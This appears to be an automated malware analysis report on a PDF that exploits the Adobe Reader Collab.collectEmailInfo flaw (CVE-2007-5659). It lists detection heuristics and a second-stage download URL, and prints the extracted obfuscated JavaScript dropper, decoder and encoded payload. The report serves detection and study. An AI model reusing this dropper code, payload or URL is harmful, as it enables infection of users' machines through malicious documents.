Malicious PDF — malware analysis report

Static analysis result for SHA-256 681b4b51695f80ab…

MALICIOUS

PDF

15.0 KB
MD5: f819b239075699bc2d623c08dc7865d5 SHA-1: 670d590afee0515edb0fb9a3b17c69a14e16bed3 SHA-256: 681b4b51695f80ab12940ab5376a98177e17911305ae8ca971717c90e1e1d15c
366 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1203 Exploitation for Client Execution

The PDF contains obfuscated JavaScript that exploits CVE-2007-5659 (Collab.collectEmailInfo) in Adobe Reader versions prior to 8.11 or 7.1. The script is designed as a multi-stage dropper, reading encoded payload from the annotation subject, decoding it, and then executing it. This decoded payload contains a URL to download a second-stage shellcode. The critical heuristics and ML classification strongly indicate malicious intent.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 10

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after static deobfuscation)
  • JavaScript action low 5 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Obfuscated multi-stage PDF JavaScript dropper high PDF_JS_OBFUSCATED_DROPPER
    PDF JavaScript shows 5 independent signals of exploit-kit-style multi-stage obfuscation: annot_subject_stage, hex_codec_loop, hex_dashed_payload, incremental_eval_build, repeated_pluginschk. This is strongly consistent with pre-2011 Adobe Reader PDF droppers — OpenAction JS reads encoded data from annotation subjects, decodes it through one or more hex / base-N loops, and invokes eval indirectly (method name built one character at a time). The actual CVE is hidden in the final decoded layer and is not visible via static analysis.
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • ClamAV: Pdf.Exploit.Agent-35901 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-35901
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://searchfunes.org/cgi-bin/159/n002106203r000cR70f08865X9e79fb70Y41c11ea5Z0100f060 Referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0005_000.js
4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d		 pdf-javascript-stream PDF /JS object 5 at offset 0x148 469 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app[fnc]/**/(buf);
}
legacy_pdfkit_stage_000.js
e902ccf1120d276c866fb58e8da574d7fea05f7b47cec6112ca7f6eae4d4c4c6		 deobfuscated-js repeated-marker hex decoded JavaScript at offset 0x1952 12129 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function mA_sp_AnC_831Ed(LB4pB_qD_3Ctv_c, o7n1tgX4T8_wgV){var Dij5pq_7f = 20;var y_q_n4_3 = 0;var eT184__c6kRJsk1 = 512;var C_48__n = Dij5pq_7f;var DqPN4_8bim = "";var a_6ACj__H3 = 4;var x7iU_Q_XC0___g = this;var l5n4__d30 = "1234ee";var V21_A1 = arguments;try {var u__fg7T = 0;if (app) {C_48__n = C_48__n + 2;o7n1tgX4T8_wgV = pr[u__fg7T].subject;}l5n4__d30 = l5n4__d30.replace(/\d+/, "call");} catch(e) { }C_48__n = C_48__n - Dij5pq_7f;var L__p__5s54o = new Array();var V_Y_xE_R0K__MH = 150;if (V_Y_xE_R0K__MH > 0) {L__p__5s54o[0] = V_Y_xE_R0K__MH;L__p__5s54o[1] = eT184__c6kRJsk1;L__p__5s54o[0] = L__p__5s54o[0] - V_Y_xE_R0K__MH;L__p__5s54o[2] = L__p__5s54o[0];L__p__5s54o[1] = L__p__5s54o[1] - eT184__c6kRJsk1;L__p__5s54o[3] = L__p__5s54o[1];}if (LB4pB_qD_3Ctv_c) { L__p__5s54o = LB4pB_qD_3Ctv_c;}if (!LB4pB_qD_3Ctv_c) {var Trp7SBHd72g = V21_A1[l5n4__d30].toString();var xclx7y18_ahNv61 = 0;var pC_pGh_k71_yu1U = xclx7y18_ahNv61;V_Y_xE_R0K__MH = V_Y_xE_R0K__MH - 102;var KQXs6TO__8613v = 0;while(pC_pGh_k71_yu1U < Trp7SBHd72g.length) {KQXs6TO__8613v = Trp7SBHd72g.charCodeAt(pC_pGh_k71_yu1U);if (KQXs6TO__8613v >= V_Y_xE_R0K__MH && KQXs6TO__8613v <= 57) {if (xclx7y18_ahNv61 == a_6ACj__H3) {xclx7y18_ahNv61 = -1;}if (xclx7y18_ahNv61 < 0) { xclx7y18_ahNv61 = 0; }L__p__5s54o[xclx7y18_ahNv61] += KQXs6TO__8613v;if (L__p__5s54o[xclx7y18_ahNv61] > eT184__c6kRJsk1) {L__p__5s54o[xclx7y18_ahNv61] -= eT184__c6kRJsk1;}xclx7y18_ahNv61 = xclx7y18_ahNv61 + 1;}pC_pGh_k71_yu1U = pC_pGh_k71_yu1U + 1;}}var e__KpT__r_4W__y = 0;var xCA_k5i1___k = 0;var n__g56D_G8pt = -1;var c_Mb0_52q = 0;var o_1_bgC7520 = 0;do {var a58Dn3 = 256;if (L__p__5s54o[c_Mb0_52q] > a58Dn3) {L__p__5s54o[c_Mb0_52q] -= a58Dn3;}c_Mb0_52q = c_Mb0_52q + 1;} while (c_Mb0_52q < a_6ACj__H3);c_Mb0_52q = c_Mb0_52q - a_6ACj__H3;while(c_Mb0_52q < o7n1tgX4T8_wgV.length) {var y44__20_L4_8_7 = o7n1tgX4T8_wgV.substr(c_Mb0_52q, 1) + ' V V ';c_Mb0_52q = c_Mb0_52q + 1;var py_ycDU_0 = parseInt(y44__20_L4_8_7, Dij5pq_7f);if (n__g56D_G8pt != -1) {xCA_k5i1___k += py_ycDU_0;if (e__KpT__r_4W__y == a_6ACj__H3) {e__KpT__r_4W__y = 0;}var V3Yx2Vt281 = xCA_k5i1___k;V3Yx2Vt281 = V3Yx2Vt281 - (o_1_bgC7520 + 2) * L__p__5s54o[e__KpT__r_4W__y];if (V3Yx2Vt281 <= 0) {V3Yx2Vt281 = V3Yx2Vt281 - Math.floor(V3Yx2Vt281 / 256) * 256;}V3Yx2Vt281 = String.fromCharCode(V3Yx2Vt281);if (C_48__n == 1) {DqPN4_8bim += py_ycDU_0;} else if (C_48__n == 2) {DqPN4_8bim += V3Yx2Vt281;} else {DqPN4_8bim += c_Mb0_52q;n__g56D_G8pt = -2;}n__g56D_G8pt = -1;e__KpT__r_4W__y = e__KpT__r_4W__y + 1;o_1_bgC7520 = o_1_bgC7520 + 1;} else if (n__g56D_G8pt == -1) {n__g56D_G8pt = Dij5pq_7f;xCA_k5i1___k = py_ycDU_0 * Dij5pq_7f;}}var C___S23_2IVF = this;C___S23_2IVF['ev'+'al'](DqPN4_8bim);}
	mA_sp_AnC_831Ed(0, "2a729ace7c8ic726b6ag2g5c6b3h5176c0557g632c9j25a58cae6eb4513e6g8f936b0d0g10705803a7b8712513b5a506702g424f3a497d65649cab7c09c50f617f2b3266c13d627c53a315cc071149116icd72200d3gbb0b5b6g0c12a5ce59304b2c803iab4gbf791b5h285aaf8j788c0d240g9f7g481ca3c58g8a0f9275c61h1g172h11583c3i1i0b4daf51387ia87da6b5365b6b3h717ibf3ha17g609c2bcabic67e0518c28j24a55jb818176b5j12a3b08a4d2dahb92e5a1327782b8354987hb38c89b91326ad6j4238a39g418b9i53722210c3c85hc63cc5a23hbg670d312c8c1e3iab9d8b711629bd98a35h2g81cc6g3hbg8aag9j03c7b4b1a69b534h2gb05i653152a00612bd9h445b7a44795b0a7584905f9d2e9f9fa55f842c287cc9ab2j1b0j4698582078a85h302i1cbj436g190d1jcd5g7564587h797b2fcf1d78502e3199ba6g9i7j456d1bafad001e056icd61b2b13ebb08579f024ic3b87860512jab3a8533b55d458b1g5i8d8i8f7c2j23a2be95533j0a2c455dbf508289ba2fa5110f77175j50a44i6c28446ba84198ba257h3a2g92758c76c9ai5j9200bjb68d44bb1h208a11ai2b282b42886c3i647i7d1a06b6a07558321h71c6748e5261718e72b8a30j7a892b4ba80b41b305569819b2a995410757078j4c84309c442b73433ib7bc6e793h0001a3aj552haa355156917ab47c0523030j0f5e4d512c1f8190ce5c6ha81ba41c044c4b1f7b460b64a27h5h61055i8e9h2e7227c18e999a5gb00d437b471387859d38392b8g44975b3840075d5j5h65798h3i0d1a0d647f4434720j686jad4f79aa020jc450146d3f83ba9h3j8h0h5h97c412c2c0765a3i008459ab2iba82418j579ea4817183ccbi9h7ia71546c5327h6eb5649cb3c7b0bebg00500b2g1da4779f68708jb74ebfcc25612c468d9ecf6290af565d08c4ajcf78c01j019j117h2b282b428
... (truncated)
deobfuscated.js
fde1653ae41648d21815c777678e622776784d798874f29b7143b8411c33c9ba		 deobfuscated-js PDF JavaScript deobfuscation pass 76093 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 9 eval/decoder/string-building token(s). Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app.eval(buf);
}

2a729ace7c8ic726b6ag2g5c6b3h5176c0557g632c9j25a58cae6eb4513e6g8f936b0d0g10705803a7b8712513b5a506702g424f3a497d65649cab7c09c50f617f2b3266c13d627c53a315cc071149116icd72200d3gbb0b5b6g0c12a5ce59304b2c803iab4gbf791b5h285aaf8j788c0d240g9f7g481ca3c58g8a0f9275c61h1g172h11583c3i1i0b4daf51387ia87da6b5365b6b3h717ibf3ha17g609c2bcabic67e0518c28j24a55jb818176b5j12a3b08a4d2dahb92e5a1327782b8354987hb38c89b91326ad6j4238a39g418b9i53722210c3c85hc63cc5a23hbg670d312c8c1e3iab9d8b711629bd98a35h2g81cc6g3hbg8aag9j03c7b4b1a69b534h2gb05i653152a00612bd9h445b7a44795b0a7584905f9d2e9f9fa55f842c287cc9ab2j1b0j4698582078a85h302i1cbj436g190d1jcd5g7564587h797b2fcf1d78502e3199ba6g9i7j456d1bafad001e056icd61b2b13ebb08579f024ic3b87860512jab3a8533b55d458b1g5i8d8i8f7c2j23a2be95533j0a2c455dbf508289ba2fa5110f77175j50a44i6c28446ba84198ba257h3a2g92758c76c9ai5j9200bjb68d44bb1h208a11ai2b282b42886c3i647i7d1a06b6a07558321h71c6748e5261718e72b8a30j7a892b4ba80b41b305569819b2a995410757078j4c84309c442b73433ib7bc6e793h0001a3aj552haa355156917ab47c0523030j0f5e4d512c1f8190ce5c6ha81ba41c044c4b1f7b460b64a27h5h61055i8e9h2e7227c18e999a5gb00d437b471387859d38392b8g44975b3840075d5j5h65798h3i0d1a0d647f4434720j686jad4f79aa020jc450146d3f83ba9h3j8h0h5h97c412c2c0765a3i008459ab2iba82418j579ea4817183ccbi9h7ia71546c5327h6eb5649cb3c7b0bebg00500b2g1da4779f68708jb74ebfcc25612c468d9ecf6290af565d08c4ajcf78c01j019j117h2b282b42886c3i647i7d1a06b6a075584j4380246b5f666ja49966c1a1ca864c074f8e1d5b87bc6b712319b6c855c63dc55i1d8629a31i568c4e6e9i985c6d3fc684616c1f1c6gcc5430a46j97a79i2j10020d85245e2328829a3g4493a72g0jad43595e34754h156bc18c5ja5299hca914f9064289bc6a558c909188c470283bh922518209c0i64392j4d1j57793e8bbe9j4f12092c5b934j59a8ac66a5ah6j7dadbh03140gb7303f812d904aca3c59a6cc0g86964b644d33704jab56bi69506465847cc98fac26b1ah7i93482ca52c8777ba8b819730191bbg1b77193c391b6c876858790f650fa62f8762c95c66a55ga07i439g33a1biad4gcd3f3089ae891h1j252860604897919f26021h096h9c324i762189738c50738habb8ahca7j450539a39g3i81a730ag1h1g909d3d2d3405834hb7440i3i288c377585894j461eb99d6j6c50278i0j8572b170b47c9g2g161e11944921ba2f6a9d35777ha1450b1833326901593acf64a05h64a31j72c39h36b5612babcabi2dbhcd20613b21a3a09212141cbb497119071a08513c3c5h8g95711hbb0b9a5f524i76246g9ia03g829gc103bh1j0e72305g1h9g3bcb3f5aa03c4gbhcf6f2624c9704fab31bc6d4f843b9c8c918f993jbi9h95a95i21c500516b1d8390c20ec00c1f4151094512b14ga2657a69ag5da50b427h5f3a54778c39a7723j6a3ib0ajbg7d9a28bd9c11a348c62j14806d2h71a7905e021h0d6c8j554c55b8645d9076a4bfa3b3ac017a874b6d009g6g9c054j7jbg1jcec82j2d6007a50e9d29bc514b801a6j88bc8d6h1913b09e76502g9j3i686jb69596b09a13ba1e04834059bjbe81972988aj01500ja511383h187d709839b7725f800a6ec5cf5f814j3176cf8a610h0c4b994gae899e50cf0db50b069f3h2j39125575688b88ab7ec622b46b4c0f3068ac4460b1649gbfa8ac0a4a053j3088c00d4488434ha22f3h949e67515f208d65882h07893f6g5i7a7cb487ah0d1698975g4g2gc50j5j50138ea88j1h20b339155h3c3g1icb7c9f417a89b86dc30g255533109h81996bbea54j9a009f7gb6810143cd8911a3641bce355b643fa2b8a852c4c8a03a5827104fcf6e91897f8199990j1c2b936j1544b113688j145075171107a251c63dc55i1a902baj4b5d8g3f4285bc7b8d3b06b76a7840379h1b8f508i8ja8aj9jbgb4acb3810h31bab24d64005b8ac722b0c447595343604acb5gbj5b2c6c055i9aa865ac1gc96gajc15c0baa1h8847257ec189303f2dc8066h191j2736736f5h957i7843b8b7bd529336699d0j4d6had6jb0cfa703ad1cc573306728b03hbb25676e290e9d8h362e24bj877fbf5d1d8241593j67aaaf8f9h3db1ag7i895a3fc50052770d977jbg232210343a4d09772j0b6e7e497g7c2164a8114b8c52c95f778c2f95b71i5d0b86a90273cd20caaf11b74g0fcf427b5b39a17h6f1a0512a035583e55751f515d857fb8bb89b91326ad6j4269a1bj42b2cc639821b29bae20083b427d3hb93bbf662b9i3642bgbc866g0cc09d5a6e1i397a0c593g8073bfa50a351j1ea66h404hcc07856b476i7h0g4516c71b6j6i467i6h0g6ebf8c2c7j2b
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.